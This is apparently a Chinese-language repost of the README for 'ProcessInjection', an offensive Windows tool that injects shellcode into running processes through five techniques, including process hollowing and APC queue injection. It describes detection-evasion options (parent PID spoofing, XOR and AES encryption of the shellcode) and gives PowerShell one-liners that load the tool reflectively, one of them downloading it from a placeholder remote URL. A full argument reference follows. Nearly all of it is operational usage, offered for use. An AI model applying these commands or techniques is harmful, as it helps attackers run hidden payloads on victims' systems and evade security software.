项目地址:https://github.com/3xpl01tc0d3r/ProcessInjection
该程序旨在执行进程注入
工具支持5种进程注入技术。
1) Vanilla Process Injection
2) DLL Injection
3) Process Hollowing
4) APC Queue
5) Dynamic Invoke - Vanilla Process Injection
工具接受4种格式的shellcode。
1) base64
2) hex
3) c
4) raw
支持3种检测规避技术
1) Parent PID Spoofing
Encryption
2) XOR Encryption (It can also be used with Parent PID Spoofing technique but can't be used with DLL Injection Technique)
3) AES Encryption (It can also be used with Parent PID Spoofing technique but can't be used with DLL Injection Technique)
通过反射加载
# Load from the disk
[System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes("ProcessInjection.exe"));
# Load from a remote server
[System.Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData("http://<URL>/ProcessInjection.exe"))
# Perform process injection
[ProcessInjection.ProcessInjection]::Main(@("/t:1", "/f:base64", "/pid:<ProcessId>", "/sc:<ShellCode>"))
Usage Description
----- -----------
/t Specify the process injection technique id.
1 = Vanilla Process Injection
2 = DLL Injection
3 = Process Hollowing
4 = APC Queue Injection
/f Specify the format of the shellcode.
base64
hex
c
raw
/pid Specify the process id.
/parentproc Specify the parent process name.
/path Specify the path of the file that contains the shellcode.
/ppath Specify the path of the executable that will be spawned (Mandatory while using /parentproc argument).
/url Specify the url where the shellcode is hosted.
/enc Specify the encryption type (aes or xor) in which the shellcode is encrypted.
/key Specify the key that will be used to decrypt the shellcode.
/sc Specify the shellcode directly in base64 or hex format. Note: To pass large shellcode please leverage reflection to run the program.
/help Show help